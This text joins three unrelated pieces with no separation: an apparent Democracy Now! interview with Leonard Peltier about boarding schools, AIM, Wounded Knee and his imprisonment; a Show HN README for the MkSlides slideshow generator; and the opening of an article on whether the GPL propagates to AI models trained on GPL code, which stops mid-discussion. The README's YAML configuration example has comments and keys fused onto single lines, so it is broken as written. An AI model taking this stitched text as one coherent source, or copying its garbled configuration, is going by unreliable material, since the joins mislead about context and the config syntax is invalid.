I keep saying “reservations,” because we was trained — we was taught from childhood that we are all reservations, we’re Indians. And we’re not Indians, and this is not a reservation. We made treaties with the United States government, and the Constitution says they shall only make treaties with sovereign nations. So we’re sovereign nations. We’re not — we’re not Indians, as they claim to be — they claim we are.
And my mother is from Fort Totten. But again, that’s not the real name. The real name is Spirit Lake, and that’s of the Lakota/Dakota people.
I was raised, majority of my life, here with my grandparents, which is usually the traditional way of my people. The grandparents will take the children and raise them. But when grandpa died, grandma had no way, no way to support us, so she went to the agency here to ask for help. And in retaliation, they took us and put us in a boarding school.
AMY
GOODMAN
:
What boarding school?
LEONARD
PELTIER
:
Wahpeton, North Dakota, 1953. I was there ’til — for three years, ’56. And it was extremely brutal conditions.
AMY
GOODMAN
:
How old were you?
LEONARD
PELTIER
:
I was 9 then, when I went. And —
AMY
GOODMAN
:
Talk about the point of these boarding schools. Was your hair cut? Did they stop you from speaking your language?
LEONARD
PELTIER
:
Of course. They did all — they did — that was the purpose of the schools, is to take the Indian out of the Indians, is what they literally — was the order. They took us to the boarding schools. The first thing they did was cut all our — buzz cut our hair, took it all off, and then put us and took us into the shower. We showered, and we come out of the shower, and we were poured all over our bodies
DDT
. As you know, that’s poisonous.
AMY
GOODMAN
:
They poured
DDT
over your body?
LEONARD
PELTIER
:
They poured
DDT
, with all the cans, on your head, the whole body. And then they gave us — issued clothes, bedding and assigned us to a bed. And that was the beginning of our treatment. It was an extremely, extremely strict school, and beatings were regular for any little violation of those rules.
I might have been a little hot-headed, I don’t know. But when I first got there, there was a group. They called themselves the Resisters. And I immediately joined them, and I became part of the Resisters. So, we would sneak behind the gymnasium, and we would talk our language. We would sing some song, even do some prayers, yeah. And if we got caught, we got the [bleep] beat out of us.
AMY
GOODMAN
:
You wrote in your book,
Prison Writings: My Life Is My Sun Dance
, that you consider these boarding schools your first imprisonment.
LEONARD
PELTIER
:
Yes, it was. Was. I found the rules more restrictive than when I went — ended up in prison.
AMY
GOODMAN
:
So, you go to this residential school with your cousin and sister for three years. Where do you come back to? And how did you maintain your language and your culture?
LEONARD
PELTIER
:
Well, I came back here to live with my father. And they were still living in log cabins, no electricity, no running water. We had to haul water. We had to haul wood. And we only had $55 to live on, which was my father’s World War II military benefits, and that’s what we had to live on.
And we were facing the — we were facing the time of termination. The United States government wrote a bill, passed by Congress, signed by the president, of termination in 1956. It was supposed to be completed by 1985. And the first one to be terminated was the Menominee Indians of Wisconsin. They had millions of making — millions of prime land, timber and lakes to make hunting lodges and other things out there. It was beautiful, which they do today. They still — they got all those things out there today. But they came and took all that land from them. Then they come here in 1958. Was it ’58? Yeah, ’58. I was 13 years old then. And they came and told us we have been terminated, and we have to accept that. We were supposed to be the second reservation to be terminated.
AMY
GOODMAN
:
The Turtle Mountain Band of Chippewa Cree.
LEONARD
PELTIER
:
Turtle Mountain Band of Chippewa Cree, yes. And my father and all of them and their generation, a lot of people left on relocation. They said, “It’s hopeless. We can’t fight these people. They’re too powerful. They got — they’re just too powerful. You know, maybe life will be better over there,” and stuff like this on this relocation. So they picked the city to go to. A lot of them went to Washington state and Oregon.
And it was a small group of us stayed here and said, “No, we’re not leaving.” So, my dad and his generation said, “Well, what do you mean, 'been terminated'? You can’t come here and tell us that we got to leave and you’re going to just terminate us as a race of people and tell us that we no longer exist. Go [bleep] yourself. Come on. Let’s fight it out.” And literally, they were — I was proud of them. I was 13 years old.
They stopped all provisions. One little girl died over here from malnutrition, and that’s what really got everybody angry.
AMY
GOODMAN
:
So they thought they would starve you out.
LEONARD
PELTIER
:
Yeah, they were making conditions so hard that we were accepting termination. We were leaving. A lot of people took to say, “Well, at least my kids won’t starve to death.”
AMY
GOODMAN
:
And the
BIA
reversed its decision?
LEONARD
PELTIER
:
They reversed their decision and gave us $50 —
AMY
GOODMAN
:
Vouchers?
LEONARD
PELTIER
:
Vouchers to go buy groceries here in Rolla. Everybody got — the whole reservation got $50.
AMY
GOODMAN
:
And they didn’t disband the reservation?
LEONARD
PELTIER
:
No, they got the hell out of here, because we told them we’re going to fight them.
AMY
GOODMAN
:
So, this was really the beginning of the Red Power Movement and the founding of
AIM
, right?
LEONARD
PELTIER
:
Well, I guess so, in so many — yeah, in so many — yeah.
AMY
GOODMAN
:
The American Indian Movement.
LEONARD
PELTIER
:
Yeah.
AMY
GOODMAN
:
Which you want to rename the American —
LEONARD
PELTIER
:
But they were — but they were doing that for — I mean, my people have been fighting back for 500 years, Amy.
AMY
GOODMAN
:
But the modern day.
LEONARD
PELTIER
:
Yeah, the modern-day stuff. But no, we went to war with them. We went to all kinds of different levels of —
AMY
GOODMAN
:
Resistance?
LEONARD
PELTIER
:
Resistance, you know.
AMY
GOODMAN
:
So, talk about the founding of
AIM
, the American Indian Movement, which you today would like to rename the American Indigenous Movement.
LEONARD
PELTIER
:
Well, I was involved in a number of different organizations before I joined
AIM
. And one of the biggest ones that I was — I helped organize the United Tribes of All Indians in Washington state. And we took over Fort Lawton. One of the treaties that we were pushing them days — actually, our people was — older people were pushing this, too, but they just passed. All of our knowledge came from traditionalists. That’s the policies, the American Indian Movement, we followed there. There.
First of all, people got to understand, the American Indian Movement policy is they can’t come onto this reservation, start dictating their policy. They have to be invited by the traditionalists or a tribal government or what else. We can’t just go onto a reservation and say, “You’re going to do this, you’re going to do that.” No, we can’t do that, and we don’t do that. We have to be invited first.
So, anyway, this was before I joined the American Indian Movement. I was involved with the fishing and hunting struggles over there. That was a big area that they really fought hard and got really —
AMY
GOODMAN
:
Fishing and hunting rights.
LEONARD
PELTIER
:
Yes, treaty rights. In fact, Marlon Brando got arrested with us in 1955. He got arrested on one of them lakes. I wasn’t there, but he was — he got arrested fishing and hunting with the Natives out there.
AMY
GOODMAN
:
So, talk about the occupation of the
BIA
offices in Washington, moving on to Wounded Knee and Pine Ridge.
LEONARD
PELTIER
:
Well, it just — our resistance became extremely popular. American Indian Movement was growing, and not just here in America — Canada, Central America. Said, “Wow! There are a lot of full bloods all through Central America,” more than people — more than here in the United States. And we were uniting with all of them, all those Natives across this country — across this whole continent, I mean. And we were uniting. We were pulling them together with the American Indian Movement. That’s why we became a threat to the government so.
And later, later on, when I was arrested — after I got arrested, this one guy was telling me, he said, “You know, I just went down to Mexico someplace, one of them towns.” And he said they were organizing for resistance and stuff like this. He said, “I was down there, down there visiting them.” He said, “I went to this old — this guy told me he was the — he was some kind of medicine man or something. So I went down and visited him, and so I went into his place,” into his — he had kind of a hut-like home, I guess. And he said, “What do I see?” He said, “I see your poster on one of the walls.” That’s so far back. But I wasn’t. We went through all that stuff. And so, anyway —
AMY
GOODMAN
:
But especially for young people to understand, I mean, you’re talking about this critical moment of 1973, ’4 and ’5.
LEONARD
PELTIER
:
’60s, actually.
AMY
GOODMAN
:
What’s that?
LEONARD
PELTIER
:
Started in the ’60s, really.
AMY
GOODMAN
:
And also the height of the antiwar movement. And the role and the effect of the antiwar movement on the Native American movement, and vice versa? If you can talk about those critical moments?
LEONARD
PELTIER
:
We were — I was, and others were, a lot of us Natives were — we were also involved in the peace marches and with the Blacks and the antiwar movements and things like that. We were involved in all that stuff, too. But we were working on trying to get their support, and they were working on trying to get our support. Then the hippies came out, and the hippies really helped us. The hippies did a lot to help us. They started dressing like Natives. They started doing things like Native people. And a lot of them came from very, very wealthy families. A lot of people hated them. That’s one of the reasons the government hated them, is because they were really pushing the Native issues, the culture and stuff like that.
AMY
GOODMAN
:
So, the Trail of Broken Treaties, that was 1972. Explain what it was, which was a takeoff on the Trail of —
LEONARD
PELTIER
:
Well, we knew that we had to get to — get the government to start honoring our treaties, because they never honored our treaties. And the only way we could do this is to go right straight to Washington. And so, we organized a group. We called it the Trail of Broken Treaties. And we all organized from all over the country. They sent representatives in old cars. We had all — nobody had new cars them days. And we all went to Washington.
AMY
GOODMAN
:
You went?
LEONARD
PELTIER
:
Of course, I did. Of course, I was there, too, yeah.
AMY
GOODMAN
:
This is, of course, a takeoff on the Trail of Tears. And most people, in our schools, and maybe less so especially now, will ever even know what the Trail of Tears was.
LEONARD
PELTIER
:
Right, right, right, precisely. That was all past — everything we did, we called it — well, like the Trail of Broken Treaties, that was done out of the Trail of Tears, and the Long Walk, all them other events like that that happened. It wasn’t just the Trail of Tears. That’s what people have to understand. It was — the Trail of Tears was just one of them that became so well known, because I think 10,000 people died on that, and just laying alongside the trails and stuff from dying from sickness, malnutrition, all that stuff, on the Trail of Tears. And that’s why it got so —
AMY
GOODMAN
:
This was President Andrew Jackson?
LEONARD
PELTIER
:
Yes, yeah.
AMY
GOODMAN
:
The president who President Trump reveres.
LEONARD
PELTIER
:
It was [bleep] order, yeah. He was a anti — he was a hater. And so, we were prevented. We organized. We organized under basically the same policies of exposing what was done in the past, what continued to be done.
And we still find it’s still happening today, Amy. Ann Coulter had made a public statement that — about Native people, that we didn’t kill enough of them Indians. That’s a very dangerous thing to say about anybody, because there’s a bunch of nuts out there, like, you know, you take one of them haters and everything, he can end up killing a lot of innocent Natives for — just because those type of words.
You got a president trying to do away with our treaties. If our treaties go, we go. This is the only thing to prove that we are a sovereign nation and a race of people. And if that goes, we go, as a race of people. So, it’s not — I mean, it’s not ending for us. We’re still in danger. Yeah, you see it happening in the streets, you know, I mean, right today. Look at what they’re doing in Palestine, killing women, children, babies, unborn babies. That’s what they did to us, man. And here it is still happening.
AMY
GOODMAN
:
So, 52 years ago, 1973, the start of the American Indian Movement’s 71-day occupation of the village of Wounded Knee on Pine Ridge Reservation, occupation helping draw international attention to the plight of Native Americans, the U.S. government responding to the occupation with a full military siege that included armored personnel carriers, F-4 Phantom jets, U.S. Marshals,
FBI
, state and local enforcement. During the occupation, two Sioux men shot dead by federal agents, and a Black civil rights activist, Ray Robinson, went missing. The
FBI
confirmed in 2014, decades later, that Ray Robinson had been killed during the standoff. Most people don’t know about this history.
LEONARD
PELTIER
:
No.
AMY
GOODMAN
:
Maybe they’ve heard the book
Bury My Heart at Wounded Knee
. So, can you talk about Pine Ridge and Wounded Knee, especially for young people who don’t know the history?
LEONARD
PELTIER
:
Well, I was in jail during the beginning of Wounded Knee, but I got out. It was about halfway through. Then I went, and I went up there, and I helped pack in stuff into Wounded Knee. And I stayed out there on the outside forces.
After we made all those trips to Washington and all that stuff, all those other demonstrations, and all those promises, they were going to do this and do that. They were going to investigate everything, all of our acquisitions and all that stuff. And we soon found out — we knew anyway, but we soon found out that was all a lie. They weren’t going to investigate [bleep]. And they didn’t.
And so, finally, the elders and the chiefs made the decision to go to Wounded Knee.
AIM
had no part in that decision. We cannot go anyplace in Indian Country and make policies. We can’t. That’s not — that is not us. We can’t do that. And we can’t go unless we’re invited by those people. And they just got fed up with so many more false promises and what was happening.
They were being terrorized by a group organized by — a mercenary group, I might add. They were provided with intelligence, armored person ammunition, sophisticated weapons, surveillance and stuff like this, automobiles and stuff. And the leader made that — admitted that on a national interview. So we know that’s all true. They tried to deny it at first, but they called themselves the Guardians of the Oglala Nation. And —
AMY
GOODMAN
:
The GOONs.
LEONARD
PELTIER
:
The GOONs, yeah.
AMY
GOODMAN
:
Dick Wilson’s.
LEONARD
PELTIER
:
Dick Wilson, all them. Nixon ordered the 82nd Airborne to go and investigate what’s going on down there. And if there was — if we were like the government was claiming, that we were communists and Marxists, and we were being financed by the communists, they were to go up there and wipe us out.
When Nixon got the 82nd Airborne involved in it, we filed a lawsuit. And it took us 10 years, but we got all this information out of the files that they had to turn over to us, right? And we found that they had went to the armory and checked out 250,000 rounds of various caliber ammunition, different sophisticated weaponry, armored personnel carriers, and finances and surveillance and stuff like that. See, that was all illegal. And that’s how we found out a lot of stuff about what they were doing there. And it was all illegal. If it would have been left to Nixon, he would have — he was going to wipe us out. But he didn’t, because, we heard, his wife stepped forward and said, “No, don’t you do that.”
AMY
GOODMAN
:
Now, still going back 50 years, what landed you in jail? I want to go to the words in
Democracy Now!
in 2003. The occupation of Wounded Knee is considered the beginning of what Oglala people refer to as the Reign of Terror, from ’73 to ’76, over 60 residents killed in this period. Murders went uninvestigated by the
FBI
, which had jurisdiction. The period culminating in the June 26th shootout for which Leonard Peltier was imprisoned.
LEONARD
PELTIER
:
First of all, I don’t know who the shooter is, or shooters. And I don’t — I wouldn’t tell you if I did know, so I’m not going to tell you anything in that area. But I’ll tell you — I’ll speak on the other issues, because it’s public knowledge, and it’s been — it’s been our attempts to continue to expose that stuff.
But there was a lot of Native people, traditionalists, whose homes were burned, whose houses were — was drive-by shootings. People were pulled over and beaten, and some shot, some killed. And those things are literally recordings on this. We got records of all this stuff now, so people can’t deny this stuff. The only ones that are denying this [bleep] is the United States government and the
FBI
and people like that.
But we faced a time called the Reign of Terror, when they were getting away with all this [bleep]. None of them were getting investigated. A lot of the older people that seen these people identified them, but the
FBI
still wouldn’t investigate. They were able to kill people at random. They were — and getting away with it, because they didn’t have — they had no fear of being prosecuted. The only fear they had was of us, the American Indian Movement, because we wouldn’t take their [bleep]. Every chance we got together, we got a confrontation with them. And that’s the only fear they had of anything, of any retaliations, any arrests or anything else.
AMY
GOODMAN
:
We’re spending the hour with Indigenous elder Leonard Peltier. He was released in February from prison after nearly 50 years behind bars. Stay with us.
[break]
AMY
GOODMAN
:
This is
Democracy Now!
, democracynow.org. I’m Amy Goodman, as we continue our conversation with Indigenous leader Leonard Peltier, released to home confinement in February after nearly half a century behind bars. I asked him about his claims that his extradition from Canada and trial in the United States were marked by prosecutorial misconduct.
AMY
GOODMAN
:
Talk about the coerced testimony of Myrtle Poor Bear, who she is.
LEONARD
PELTIER
:
Who is she?
AMY
GOODMAN
:
I mean, I know you didn’t know her at the time.
LEONARD
PELTIER
:
I never knew her. Her father came to my — was going to come testify at my trial that she had a serious mental problem. And her sister was going to testify that on the day of the shootout, they were sitting there drinking beer. And we got this all on tape. And they were sitting there drinking, drinking beer, and they ran out of beer. And they were watching TV, she said, and they decided to make a run off the reservation, because it was a dry reservation. No alcohol was allowed there. And so, she says, to go buy some more beer, come back and watch some more TV. And they started driving down the road, and all of a sudden a bulletin came over the radio: a big shootout in Oglala between the Marshals,
FBI
,
BIA
cops,
GOON
squads against the American Indian Movement. So they were over 50 miles away. Finally, Myrtle admitted that she didn’t know me.
AMY
GOODMAN
:
But she — her testimony said that —
LEONARD
PELTIER
:
Her testimony in the grand jury is what got us all indicted.
AMY
GOODMAN
:
Said she was your girlfriend and she had seen —
LEONARD
PELTIER
:
She witnessed — oh god.
AMY
GOODMAN
:
Seen all of this.
LEONARD
PELTIER
:
When the lawyers came to me in Canada, they said, “Leonard” — they said, “Leonard, we got bad news for you.” And I said, “Yeah? What kind of bad news?” And they said, “Your girlfriend’s testifying against you.” And I looked at him, and I said, “My girlfriend? What do you mean? My girlfriend?” Said, “Your girlfriend.” And I said, “I don’t have a girlfriend. I got a wife, two kids.”
AMY
GOODMAN
:
So, talk about James Reynolds, the former U.S. attorney in charge of the prosecution, that helped convict you. He later becomes an advocate for your release, stating the prosecution could not prove that you had committed any offense and the conviction was unjust. He wrote to president after president — he himself was appointed by Carter — right through to Biden.
LEONARD
PELTIER
:
Yes. Well, about 10 years ago, James Reynolds started to have a change of heart, I guess. James Reynolds said that there is no evidence Leonard Peltier committed any crimes on that reservation. And that’s pretty — he was in charge of everything.
AMY
GOODMAN
:
What this ultimately leads to is your imprisonment for 49 years.
LEONARD
PELTIER
:
Yeah.
AMY
GOODMAN
:
The majority of your life behind bars, what this institutionalization meant for you, what it meant to be both a prisoner and considered a political prisoner around the world and a symbol of the fight for Native American rights and what happens to you when you engage in it, all of those things?
LEONARD
PELTIER
:
Well, OK, I think — I’ve been asked this question quite a bit, and it’s hard for me to answer. But I think that what really kept me strong was my anger. I was extremely angry about what they did to me and my people. And I’m still — still very, very [bleep] angry. And there was no way in hell I was going to get justice. I could have had — I had at least 14 constitutional issues that I should have been released on, at least that many, and I knew I wasn’t going to get it. I knew what it was — the courts were not going to give it to me. And, I mean, even the Supreme Court would refuse to hear my case and stuff like that. But I knew why. You know, I found evidence of them meeting with Judge Heaney. And Judge Heaney became a strong advocate for my release. But we found evidence he worked with the
FBI
.
And I just — I felt so much hate and anger, and what they — what they did to Native people in this country, this continent, and that kept me strong. It kept me from — oh, kept me from — I’ve been offered numerous times, or a few times anyway, that if I accepted responsibility and made statements, that everything we’ve said negative about the United States government, what their past history was, and their dealings with our — with us, as people in the nation, they would turn me loose. And I refused to do that. I refused to bow down to them. And I still refuse to bow down to them. I’m going to die with my beliefs. And I just refuse to — to me, it’s treason against my nation, my people.
AMY
GOODMAN
:
You’re a major symbol of Indigenous power, not only in the United States, but around the world. What does that mean to you?
LEONARD
PELTIER
:
Well, I hope I can use it to benefit my people. I mean, as I said earlier, we’re still in danger. It’s not over for us. We don’t get to live like the rest of the people in this country, without fear of what would happen to us if we had our treaties taken away from us. We don’t get to live like that. We still have to live under that, that fear of losing our identity, losing our culture, our religion and stuff. Most Americans don’t have to worry about that. We do. And so, the fight for, the struggle still goes on for me. I’m not going to give up. I’m not going to — I have not surrendered. I don’t want to go back to prison, although I heard that Trump was going to try to take away all of Biden’s pardons and everything else like that.
AMY
GOODMAN
:
What would you say to young Indigenous people? I’m looking behind you at a photograph of — is it a picture of your great-granddaughter?
LEONARD
PELTIER
:
Yeah, this one, right here.
AMY
GOODMAN
:
And she’s wearing a T-shirt that says “strong.” How old is she?
LEONARD
PELTIER
:
She’s now 11. Now 11. We adopted her when she was a little baby, been taking care of her ever since. And she loves me and thinks I’m the greatest thing in the world. I love her because she is the greatest thing in the world. And she was — she’s now a champion fly swimmer. She was going to — her plan was, if she wins the Olympics, she was going to take those Olympics and say, “This is for my grandpa, Leonard Peltier, who they illegally put in prison. This is for him.” I said, “Where did you come up with that?” She won’t say, but she just looks at me, yeah.
AMY
GOODMAN
:
You know, we’ve been covering the climate movement for so many years, were here in North Dakota covering the standoff at Standing Rock, the Sioux-led, Indigenous-led global movement to preserve the environment. And this year, the U.N. climate summit is in just the tip of the rainforest, Belém in Brazil. And each of these U.N. climate summits, we see Indigenous people, especially young Indigenous people, there fighting for the planet. Do you see the voice of Indigenous people on the climate movement as hopeful?
LEONARD
PELTIER
:
We’ve been talking about this for 250 years — or, no, since America was first organized. We still — when we pray and when we — whatever we do, we still talk about Mother Earth and other environment stuff. We haven’t stopped. We never will stop. You know, we are still strong on environmentalists.
AMY
GOODMAN
:
Well, Leonard Peltier, I want to say thank you so much for inviting us into your home. I’m so glad we’re not coming to a prison.
LEONARD
PELTIER
:
Well, so am I.
AMY
GOODMAN
:
Indigenous leader Leonard Peltier, speaking in September at his home on the Turtle Mountain Reservation in North Dakota on his 81st birthday weekend.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Show HN: MkSlides – Markdown to slides with a similar workflow to MkDocs
Use
mkslides
to easily turn Markdown files into beautiful slides using the power of
Reveal.js
!
MkSlides
is a static site generator that's geared towards building slideshows. Slideshow source files are written in Markdown, and configured with a single YAML configuration file. The workflow and commands are heavily inspired by
MkDocs
and
reveal-md
.
Features
Build static HTML slideshow files from Markdown files.
Turn a single Markdown file into a HTML slideshow.
Turn a folder with Markdown files into a collection of HTML slideshows with an index landing page.
Publish your slideshow(s) anywhere that static files can be served.
Locally on your own device.
On a web server.
Deploy through CI/CD with GitHub/GitLab (like this repo!).
E.g. when your Markdown files are located in the
slides/
folder:
If the
slides
folder doesn't exists, it will fallback to
docs
for backwards compatibility. If
docs
also doesn't exists, it will error.
E.g. when your Markdown files are located in the
somefolder/
folder:
mkslides build somefolder/
E.g. when you have a single Markdown file called
test.md
:
⚠️
When you use a single file as
PATH
, only default static assets will be copied to the output folder. If you want to include images or other files, create a folder instead and pass that as
PATH
. Using a file as
PATH
is more meant for a quick slideshow in a pinch using only text.
Just create a
mkslides.yml
. All options are optional, you only have to add what you want to change to
mkslides.yml
.
Relative file paths are considered relative to the directory containing Markdown files (
PATH
).
Here's an example showcasing all possible options in the config file:
# Configuration for the generated index pageindex:
# Enables or disables the "Documentation built with MkSlides." footer:# booleanenable_footer: true# Favicon of the generated index page: file path or public url to favicon# filefavicon: example-index-favicon.ico# Navigation section describing how to structure the slides on the index# page. This is similar to the `nav` option from MkDocs: list[any]nav:
- Example: example1.md
- "Example 2": somewhere/example1.md
- example3.md
- somewhere/example4.md
- "More examples":
- example5.md
- "Much more examples":
- "Last example": somewhere/much/more/examples/example6.md# Title of the generated index page: stringtitle: example-title# Jinja 2 template to generate index HTML: file path to Jinja2 filetemplate: example.jinja# Theme of the generated index page: file path or public url to CSS filetheme: example-index-theme.css# Configuration for the slidesslides:
# Charset of the slides: string# (see https://revealjs.com/markdown/#external-markdown)charset: utf-8# Favicon of the slides: file path or public url to favicon filefavicon: example-slides-favicon.ico# Theme for syntax highlighting of code fragments on the slides: file path# to CSS file, public url to CSS file, or one of the highlight.js built-in# themes such as `monokai`, `obsidian`, `tokyo-night-dark`, `vs`, ...# (see https://highlightjs.org/examples)highlight_theme: example-slides-highlight-theme.css# Relative path to a python script containing a function# Callable[[str], str] named `preprocess`. Important: a relative file path# here is considered relative to the configuration file, as you probably# don't want to serve the python scripts.# For each Markdown file, the whole file content is given to the function as# a str. The returned string is then further processed as the Markdown to# give to Reveal.jspreprocess_script: tests/test_preprocessors/replace_ats.py# Separator to determine notes of the slide: regexp# (see https://revealjs.com/markdown/#external-markdown)separator_notes: "^Notes?:"# Separator to determine end current/begin new vertical slide: regexp# (see https://revealjs.com/markdown/#external-markdown)separator_vertical: ^\s*-v-\s*$# Separator to determine end current/begin new slide: regexp# (see https://revealjs.com/markdown/#external-markdown)separator: ^\s*---\s*$# Jinja 2 template to generate index HTML: file path to Jinja2 filetemplate: ./example.jinja# Theme of the slides: file path to CSS file, public url to CSS file, or one# of the reveal.js themes such as `black`, `white`, `league`, `solarized`,# `dracula`, ... (see https://revealjs.com/themes/)theme: example-slides-theme.css# Title of the slides. If this is set for a slide, it will be used for the# entry in the generated index HTML: stringtitle: example-title# Options to be passed to reveal.js: options in yaml format, they will be# translated to JSON automatically (see https://revealjs.com/config/)revealjs:
height: 1080width: 1920transition: fadeexample_plugin:
example_plugin_option_A: trueexample_plugin_option_B: qwerty# Plugins or additional CSS/JavaScript files for the slides. These are given as# a list.plugins:
# Name of the plugin (optional, see plugin README): plugin id string# (see https://revealjs.com/creating-plugins/#registering-a-plugin)
- name: RevealExamplePlugin# List of CSS files of the plugin (optional, see plugin README):# public url to CSS file per entryextra_css:
- https://cdn.jsdelivr.net/npm/reveal.js-example-pluging/example.min.css# List of JavaScript files of the plugin (optional, see plugin README):# public url to JavaScript file per entryextra_javascript:
- https://cdn.jsdelivr.net/npm/reveal.js-example-pluging/example.min.js
- name: RevealMermaidextra_javascript:
- https://cdn.jsdelivr.net/npm/reveal.js-mermaid-plugin/plugin/mermaid/mermaid.min.js
- extra_javascript:
- https://cdn.jsdelivr.net/npm/reveal-plantuml/dist/reveal-plantuml.min.js
Default config (also used if no config file is present):
index:
enable_footer: truetemplate: assets/templates/index.html.jinja # Comes with the pip packagetitle: Indexslides:
highlight_theme: monokaitemplate: assets/templates/slideshow.html.jinja # Comes with the pip packagetheme: blackrevealjs:
history: trueslideNumber: c/t
It is also possible to override
slides
,
revealjs
, and
plugins
options on a per Markdown file base using it's frontmatter. Here, relative file paths are considered relative to the Markdown file itself.
---slides:
theme: solarizedhighlight_theme: vsseparator: <!--s-->title: Frontmatter title.revealjs:
height: 1080width: 1920transition: zoom---# Slides with frontmatter<!--s-->## Lorem ipsum
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
<!--s-->
Notes:
title
here is a frontmatter-only available option to set the title of this slideshow in the generated index page. This option is not available in
mkslides.yml
.
The precedence is frontmatter >
mkslides.yml
> defaults.
Full help
Usage: mkslides [OPTIONS] COMMAND [ARGS]...
MkSlides - Slides with Markdown using the power of Reveal.js.
Options:
-V, --version Show the version and exit.
-v, --verbose Enable verbose output
-h, --help Show this message and exit.
Commands:
build Build the MkSlides documentation.
serve Run the builtin development server.
Usage: mkslides build [OPTIONS] [PATH]
Build the MkSlides documentation.
PATH is the path to the directory containing Markdown files. This argument
is optional and will default to 'slides', or 'docs' if the first directory
doesn't exist. If PATH is a single Markdown file or a directory containing a
single Markdown file, it will always be processed into `index.html`
regardless the name of the Markdown file.
Options:
-f, --config-file FILENAME Provide a specific MkSlides-Reveal config file.
-d, --site-dir PATH The directory to output the result of the slides
build. All files are removed from the site dir
before building.
-s, --strict Fail if a relative link cannot be resolved,
otherwise just print a warning.
-h, --help Show this message and exit.
Usage: mkslides serve [OPTIONS] [PATH]
Run the builtin development server.
PATH is the path to the directory containing Markdown files. This argument
is optional and will default to 'slides', or 'docs' if the first directory
doesn't exist. If PATH is a single Markdown file or a directory containing a
single Markdown file, it will always be processed into `index.html`
regardless the name of the Markdown file.
Options:
-f, --config-file FILENAME Provide a specific MkSlides-Reveal config file.
-s, --strict Fail if a relative link cannot be resolved,
otherwise just print a warning.
-a, --dev-addr <IP:PORT> IP address and port to serve slides locally.
-o, --open Open the website in a Web browser after the
initial build finishes.
-h, --help Show this message and exit.
When GitHub Copilot was launched in 2021, the fact that its training data included a vast amount of Open Source code publicly available on GitHub attracted significant attention, sparking lively debates regarding licensing. While there were issues concerning conditions such as attribution required by most licenses, there was a particularly high volume of discourse suggesting that the conditions of copyleft licenses, such as the GNU General Public License (GNU GPL), would propagate to the model itself, necessitating that the entire model be released under the same license. The propagation of the GPL is a concept that many modern software engineers have naturally accepted; thus, for an engineer with a straightforward sensibility, it is a perfectly natural progression to think that if GPL code is included in some form, copyleft applies and the license propagates.
However, as of 2025, the theory that the license of the source code propagates to AI models trained on Open Source code is not seen as frequently as it was back then. Although some ardent believers in software freedom still advocate for such theories, it appears they are being overwhelmed by the benefits of AI coding, which has overwhelmingly permeated the programming field. Amidst this trend, even I sometimes succumb to the illusion that such a theory never existed in the first place.
Has the theory that the license of training code propagates to such AI models been completely refuted?
Actually, it has not. This issue remains an indeterminate problem where lawsuits are still ongoing and the judgments of major national governments have not been made clear. In this article, I will explain the current situation of this license propagation theory, namely “GPL propagates to AI models trained on GPL code,” and connect it to points of discussion such as the legal positioning of models and the nature of the freedom we pursue in the AI domain.
Note:
This article is an English translation of a post
originally written in Japanese.
While it assumes a Japanese reader, I believe it may also be useful for an English-speaking audience.
The Current Standing in Two Lawsuits
First, let us organize what the “GPL propagation theory to AI models” entails. This is the idea that when an AI model ingests GPL code as training data, the model itself constitutes a derivative work (derivative) of the GPL code; therefore, when distributing the model, the copyleft conditions of the GPL, such as the obligation to disclose source code, apply. In other words, it is not a question of whether the output of the model is similar to the GPL code, but a theory that “since the model itself is a derivative containing GPL code, the GPL extends to the model.” While there were many voices supporting this theory around 2021, as mentioned earlier, it is no longer the mainstream of the discussion today. However, two major ongoing lawsuits can be cited as grounds that this theory has not been completely denied. These are
Doe v. GitHub
(the Copilot class action) filed in the United States and
GEMA v. OpenAI
filed in Germany. I will explain the history and current status of each lawsuit below.
Doe v. GitHub (Copilot Class Action): The Persisting Claim of Open Source License Violation
In the Copilot class action filed at the end of 2022 in relation to GitHub Copilot, anonymous developers became plaintiffs and argued that GitHub, Microsoft, and OpenAI trained their models on source code from public repositories without permission, inviting massive license violations through Copilot. Specifically, they viewed it as problematic that when Copilot reproduces part of the code that served as the training source in its output, it does not perform the author attribution or copyright notice required by licenses such as MIT or Apache-2.0 at all, and furthermore, it indiscriminately trains on and outputs code under licenses that impose copyleft conditions like the GPL, thereby trampling on license clauses. The plaintiffs claimed this was a contractual violation of open source licenses and also sought damages and injunctions, asserting that it constituted a violation of the Digital Millennium Copyright Act (DMCA) under copyright law.
In this case, several decisions have already been handed down by the United States District Court for the Northern District of California, and many of the plaintiffs’ claims have been dismissed. What were dismissed were mainly peripheral claims such as DMCA clause violations, privacy policy violations, unjust enrichment, and torts, but some DMCA violations and the claim of “violation of open source licenses” (breach of contract) are still alive. Regarding the latter specifically, the argument is that despite the plaintiffs’ code being published under licenses like GPL or MIT, the defendants failed to comply with the author attribution or the obligation to publish derivatives under the same license, which constitutes a contractual violation. Although the court did not recognize claims for monetary damages because the plaintiffs could not demonstrate a specific amount of damage, it determined that there were sufficient grounds for the claim for injunctive relief against the license violation itself. As a result, the plaintiffs are permitted to continue the lawsuit seeking an order prohibiting the act of Copilot reproducing others’ code without appropriate license indications.
As is clear from the above history, “violation of open source licenses in training data” is still being contested in court in the Copilot litigation, and this is one of the reasons why the theory of license propagation to models has not been completely denied. The plaintiffs’ claim in this lawsuit does not directly demand the release of the model itself under the GPL, but it legally pursues the point that license conditions were ignored in the process of training and output; consequently, it suggests that “if the handling does not follow the license of the training data, the act of providing the model could be illegal.” Furthermore, the court has not clearly rejected this logic at this stage and has indicated a judgment that the use of open source code is accompanied by license obligations, and providing tools that ignore this could constitute a tort subject to injunction.
However, it is necessary to note that the claims in the Copilot litigation are legally framed as breach of contract (license) or DMCA violation, and are not a direct copyright argument that “the model is a derivative work of GPL code.” No judgment has been shown stepping so far as to mandate the disclosure of the entire model under the GPL license. The actual judgment is conservative, stating “monetary damages have not been shown, but there is room for future injunctive relief,” and does not mention the obligation to disclose the model itself. In other words, at present, there is no judicial precedent directly addressing the “GPL propagation theory to models,” and the situation is one where the issue raised regarding license violation of the source code remains alive in the judicial arena.
